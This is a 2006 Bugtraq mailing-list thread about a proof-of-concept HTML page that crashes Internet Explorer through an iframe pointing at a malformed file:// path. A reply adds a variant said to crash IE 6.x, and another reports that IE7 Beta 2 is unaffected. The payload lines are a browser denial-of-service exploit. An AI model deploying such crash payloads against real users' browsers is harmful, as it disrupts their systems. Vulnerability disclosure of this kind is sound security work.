Re: RE: Internet Explorer vulnerbility

[Charles Hamby <fixer () gci net>]

If you change:

<HTLM><BODY><IFRAME src="File://þ:/"></BODY></HTML>

to:

<HTLM><BODY><IFRAME src="File://%f%f%f%f:/"></BODY></HTML>

it will also crash IE 6.x.  Don't know about 7 Beta.  

-cdh

----- Original Message -----
From: "Greg Merideth (Forward Technology)" <gmerideth () forwardtechnology net>
Date: Monday, June 12, 2006 1:18 pm
Subject: RE: Internet Explorer vulnerbility
To: Mr.Niega () gmail com, bugtraq () securityfocus com

> IE7 Beta 2 build [7.0.5346.5] parses without crashing.
>
> Greg Merideth
> Forward Technology, LLC.
> CTO & Other Wild Stuff
> gmerideth () forwardtechnology net
> PGP Fingerprint
> 18C3CE191171736225D62C3829F7B18A00F2AC0C
>
> -----Original Message-----
> From: Mr.Niega () gmail com [mailto:Mr.Niega () gmail com] 
> Sent: Thursday, June 08, 2006 3:01 PM
> To: bugtraq () securityfocus com
> Subject: Internet Explorer vulnerbility
>
> /*
> *
> * Internet Explorer Crash [Proof of concept]
> * Bug discovered by MarjinZ & Mr.Niega
> * http://www.swerat.com/
> *
> * Affected Software: Internet explorer
> * Severity: Unknown
> * Impact: Crash
> * Solution Status: Unpatched
> *
> * E-Mail: Mr.Niega () gmail com & MarjinZ () gmail com
> * __  __       __  __ 
> *|  \/  | __ _|  \/  |
> *| |\/| |/ _` | |\/| |
> *| |  | | | | | |  | |
> *|_|  |_|_| |_|_|  |_|
> * Credits goes out to GärBiz a.k.a *Gabriel,Garbiz,Gabbelito,Gärbpiz
> * K@2@nj@n §w€nn§0n
> *
> */
> <HTLM><BODY><IFRAME src="File://þ:/"></BODY></HTML>